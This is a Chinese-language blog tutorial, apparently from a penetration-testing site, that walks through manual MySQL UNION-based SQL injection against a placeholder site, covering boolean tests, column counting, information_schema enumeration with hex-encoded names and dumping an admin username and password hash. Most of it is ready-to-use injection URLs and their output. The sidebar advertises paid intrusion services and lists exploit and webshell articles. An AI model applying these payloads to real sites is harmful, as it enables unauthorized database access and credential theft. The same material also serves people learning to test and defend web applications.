1、mysql的注释符号
#
--空格
/*里面的内容都会被注释*/
用于注释后后面语句 不再执行
例如
select * fromartile where id=1#这个部分的语句不再执行
2、注入常用查询系统信息函数
version()
MySQL 版本
user()
数据库用户名
database()
数据库名
@@datadir
数据库路径
@@version_compile_os
操作系统版本
3、判断是否存在注入
页面是否返回正常,或是否存在报错信息
and 1=1 正常
and 1=2 错误
&&1=1 转码 %26%261=1 正常
&&1=2 转码 %26%261=2 错误
http://target_sys.com/article.php?id=-1 or 1=2 or 1=2
or 1=1
or 102
-1||1=2 转码-1 %7c%7c1=2 正常
-1||1=2 转码-1%7c%7c1=2 错误
&&与||这种特殊的符号 一定要在浏览器url前进行转码之后方可提交 因为浏览器默认不会进行编码
4、判断列数
order by 3
order by 3 页面正常 order by 4 页面返回空白 或者文章没有显示出来,列数为3个
mysql与access数据库不一样。在没有表名的前提下也可以查询数据库一些信息,如安装路径、库名、操作系统信息
system_user() 系统用户名
user() 用户名
current_user 当前用户名
session_user()连接数据库的用户名
database() 数据库名
version() MYSQL数据库版本
load_file() MYSQL读取本地文件的函数
@@datadir 读取数据库路径
@@basedir MYSQL 安装路径
@@version_compile_os操作系统
5、 联合查询union select
union select 查询两个表的内容
http://target_sys.com/article.php?id=-1union select 1,2,3 http://target_sys.com/article.php?id=1and 1=2 union select 1,2,3
以上两个语句的意思都是相同的 前面获取数据为null 将会显示后面的数字
6、查询库名
把数字替换成你要查询的函数名 database() 当前数据库名
7、 查询表名
mysql 里面有一个库information_schema 里面存在很多信息,其中包括所有的库名, 表名, 字段名。因为可以利用这个库来获取当前库的表
语句如下
http://target_sys.com/article.php?id=-1union select 1,2,TABLE_NAME from information_schema.TABLES whereTABLE_SCHEMA=database() limit 0,1
target_sys
http://target_sys.com/article.php?id=-1union select 1,2,TABLE_NAME from information_schema.TABLES whereTABLE_SCHEMA=0x7461726765745f737973 limit 0,1
这个database()函数与 target_sys 相同,如果不使用database()函数就要把target_sys 转换 十六进制 0x7461726765745f737973
limit 0,1 就是获取第一个表名 获取第二个表名 就要把0 改变成 1 第三个 2 第四 3 如此类推 直接 返回 空
admin
article
moon_range
8、查询字段
查询字段也是查询 information_schema库 里的信息。
admin表 转换 成十六进制 0x61646d696e
http://target_sys.com/article.php?id=-1union select 1,2,COLUMN_NAME from information_schema.COLUMNS whereTABLE_NAME=0x61646d696e limit 0,1
id
username
password
9、查询数据
http://target_sys.com/article.php?id=-1union select 1,2,group_concat(username,0x3a,password) from ad
min
group_concat() 用于 打印并接字符串 输出两个字段的内容 0x3a是 字符 :最终的结果是
admin:e10adc3949ba59abbe56e057f20f883e
猜你还喜欢
- 07-08八年专业安全团队承接渗透入侵维护服务
- 08-06SQLMAP的注入命令以及使用方法
- 08-03白帽故事汇:网络安全战士从来不是「男生」的专利
- 07-27编辑器漏洞手册
- 07-12web安全之如何全面发现系统后台
- 02-22常见Web源码泄露总结
- 07-25网站后台登陆万能密码
- 07-23破解emlog收费模板“Begin”
- 01-12批量检测SQL注入
- 01-22Apache Solr远程代码执行漏洞(CVE-2017-12629)从利用到入侵检测
- 随机文章
-
- 记一次曲折而又有趣的渗透
- XSS扫描器成长记
- Apache AJP 协议 CVE-2020-1938 漏洞分析
- TAS:一款轻量级tty修改与代码伪造框架
- 2020年仍然有效的一些XSS Payload
- OpenBSD SMTP漏洞分析报告
- 逻辑漏洞小结之SRC篇
- 详解64位静态编译程序的fini_array劫持及ROP攻击
- Ctftool:一款功能强大的交互式CTF漏洞利用工具
- Web漏洞扫描碎碎念
- 渗透技巧——从远程桌面客户端提取明文凭据
- 记一次某OA的渗透测试(前台注入)
- 远控免杀从入门到实践(3)-代码篇-C/C++
- 常见的Web源码泄漏漏洞及其利用
- 提取Chrome中Cookie工具分享
- 从防护角度看Struts2历史漏洞
- kali下安装 w13scan 被动扫描器和使用
- 远控免杀从入门到实践(5)-代码篇-Python
- 突破PHP函数禁用执行Shell代码分析
- 挖洞经验 | 登录注册表单渗透
- 热门文章
-
- 八年专业安全团队承接渗透入侵维护服务
- Emlog黑客站模板“Milw0rm”发布
- Stuxnet纪录片-零日 Zero.Days (2016)【中文字幕】
- SQLMAP的注入命令以及使用方法
- 白帽故事汇:网络安全战士从来不是「男生」的专利
- 编辑器漏洞手册
- web安全之如何全面发现系统后台
- 常见Web源码泄露总结
- 渗透测试培训(第五期)
- 深入理解JAVA反序列化漏洞
- cmseasy前台无需登录直接获取敏感数据的SQL注入(有POC证明)
- 网站后台登陆万能密码
- 黑麒麟2016渗透培训系列教程
- 破解emlog收费模板“Begin”
- 那些强悍的PHP一句话后门
- Android平台渗透测试套件zANTI v2.5发布(含详细说明)
- 渗透工具BackTrack与KaliLinux全套视频教程
- Python列为黑客应该学的四种编程语言之一 初学者该怎么学
- CVE-2017-11882漏洞复现和利用
- 恶意程序报告在线查询工具
文章存档
- 2021年3月(4)
- 2020年12月(4)
- 2020年11月(5)
- 2020年10月(8)
- 2020年9月(8)
- 2020年8月(20)
- 2020年7月(47)
- 2020年6月(70)
- 2020年5月(41)
- 2020年4月(21)
- 2020年3月(120)
- 2020年2月(26)
- 2019年12月(12)
- 2019年11月(13)
- 2019年10月(17)
- 2019年9月(15)
- 2019年8月(13)
- 2019年7月(15)
- 2019年6月(15)
- 2019年5月(19)
- 2019年4月(23)
- 2019年3月(19)
- 2019年2月(11)
- 2019年1月(29)
- 2018年12月(24)
- 2018年11月(56)
- 2018年10月(79)
- 2018年9月(20)
- 2018年8月(17)
- 2018年7月(16)
- 2018年6月(7)
- 2018年5月(10)
- 2018年3月(6)
- 2018年2月(2)
- 2018年1月(11)
- 2017年11月(18)
- 2017年10月(6)
- 2017年9月(8)
- 2017年8月(7)
- 2017年7月(7)
- 2017年6月(15)
- 2017年5月(30)
- 2017年4月(7)
- 2017年3月(1)
- 2017年2月(4)
- 2017年1月(1)
- 2016年12月(3)
- 2016年11月(7)
- 2016年10月(6)
- 2016年9月(6)
- 2016年8月(102)
- 2016年7月(24)
- 2013年7月(1)
- 文章标签
-